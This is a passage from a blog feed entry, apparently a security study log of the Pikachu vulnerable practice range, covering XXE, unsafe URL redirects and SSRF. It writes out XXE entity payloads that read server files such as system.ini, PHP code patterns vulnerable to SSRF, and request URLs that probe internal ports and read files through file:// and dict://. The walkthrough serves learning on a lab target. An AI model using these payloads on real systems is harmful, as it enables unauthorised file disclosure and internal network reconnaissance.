#89DDFF"> ?></span></span><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">DOCTYPE</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">ANY</span><span style="color: #89DDFF"> [ </span></span><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">ENTITY</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">f</span><span style="color: #F78C6C"> SYSTEM </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">file:///flag</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF"> ></span></span><span class="line"><span style="color: #89DDFF">]></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">x</span><span style="color: #89DDFF">>&</span><span style="color: #BABED8">f</span><span style="color: #89DDFF">;</</span><span style="color: #F07178">x</span><span style="color: #89DDFF">></span></span></code></pre></div><p>The entity must be given a name (<code>f</code> here) so that <code>&f;</code> in the body can reference it; the parser replaces the reference with the contents of the file</p><h3 id="Pikachu关卡-12"><a href="#Pikachu关卡-12" class="headerlink" title="Pikachu关卡"></a>Pikachu levels</h3><ul><li><p>payload:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8"><?xml version = "1.0"?></span></span><span class="line"><span style="color: #babed8"><!DOCTYPE ANY [</span></span><span class="line"><span style="color: #babed8"> <!ENTITY f SYSTEM "file:///Windows/system.ini"></span></span><span class="line"><span style="color: #babed8">]></span></span><span class="line"><span style="color: #babed8"><x>&f;</x></span></span></code></pre></div></li><li><p>Any file the server process can read is returned<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20195858.png?raw="></p></li></ul><h2 id="不安全的url跳转"><a href="#不安全的url跳转" class="headerlink" title="不安全的url跳转"></a>Unsafe URL redirect</h2><h3 id="概述-13"><a href="#概述-13" class="headerlink" title="概述"></a>Overview</h3><ul><li>If the backend takes a value supplied from the frontend (a user parameter, or a URL embedded in the page beforehand) as the redirect target without validating it, the redirect can be pointed at the wrong destination</li><li>Impact: phishing</li></ul><h3 id="Pikachu关卡-13"><a href="#Pikachu关卡-13" class="headerlink" title="Pikachu关卡"></a>Pikachu levels</h3><ul><li>Clicking the third sentence performs a redirect that should lead to the overview page; the target is taken from the <code>url</code> parameter<br><code>http://192.168.5.146:7090/vul/urlredirect/urlredirect.php?url=unsafere.php</code></li><li>The url parameter accepts any URL, e.g. <code>url=https://google.com</code> redirects there; a link on the trusted domain that lands on an attacker's page is the basis for phishing</li></ul><h2 id="SSRF-服务端请求伪造"><a href="#SSRF-服务端请求伪造" class="headerlink" title="SSRF-服务端请求伪造"></a>SSRF: server-side request forgery</h2><h3 id="概述-14"><a href="#概述-14" class="headerlink" title="概述"></a>Overview</h3><ul><li><p>The server offers a feature that fetches data <strong>from other servers or applications</strong> without filtering or restricting the target address</p></li><li><p>Data flow: attacker -> server -> target address</p></li></ul><h4 id="产生SSRF漏洞的函数"><a href="#产生SSRF漏洞的函数" class="headerlink" title="产生SSRF漏洞的函数"></a>Functions that give rise to SSRF</h4><ul><li><p><strong>file_get_contents</strong></p><p> Reads a file from the given URL:</p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">content </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">file_get_contents</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">url</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]);</span><span style="color: #BABED8"> </span></span></code></pre></div></li><li><p><strong>fsockopen</strong></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$fp = fsockopen($host, intval($port), $errno, $errstr, 30); </span></span></code></pre></div></li><li><p><strong>curl_exec</strong></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">link </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">url</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">curlobj </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl_init</span><span style="color: #89DDFF">();</span></span><span class="line"><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> CURLOPT_POST</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">,</span><span style="color: #BABED8">CURLOPT_URL</span><span style="color: #89DDFF">,$</span><span style="color: #BABED8">link</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> CURLOPT_RETURNTRANSFER</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">result</span><span style="color: #89DDFF">=</span><span style="color: #82AAFF">curl_exec</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">);</span></span></code></pre></div></li></ul><p><em><strong>Stream wrappers (pseudo-protocols such as file:// and dict://) can be used through these functions as well</strong></em></p><h3 id="Pikachu关卡-14"><a href="#Pikachu关卡-14" class="headerlink" title="Pikachu关卡"></a>Pikachu levels</h3><ul><li><p>The level uses <code>curl_exec()</code> to send the request, so it can probe the internal network, e.g. port 3306: <code>http://192.168.5.146:7090/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1:3306</code></p><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20203750.png?raw="></p></li><li><p>Read arbitrary files on the server with the file protocol: <code>http://192.168.5.146:7090/vul/ssrf/ssrf_curl.php?url=file:///C:/Windows/system.ini</code></p><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20204301.png?raw="></p></li><li><p>Scan open ports on internal hosts with the dict protocol:<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20204540.png?raw="></p></li></ul>]]></content>
<summary type="html"><h1 id="Pikachu靶场实操"><a href="#Pikachu靶场实操" class="headerlink" title="Pikachu靶场实操"></a>Hands-on with the Pikachu range</h1><h2 id="暴力破解"><a href="#暴力破解" class="</summary>
<category term="Cybersecurity" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="Study log" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
</entry>
</feed>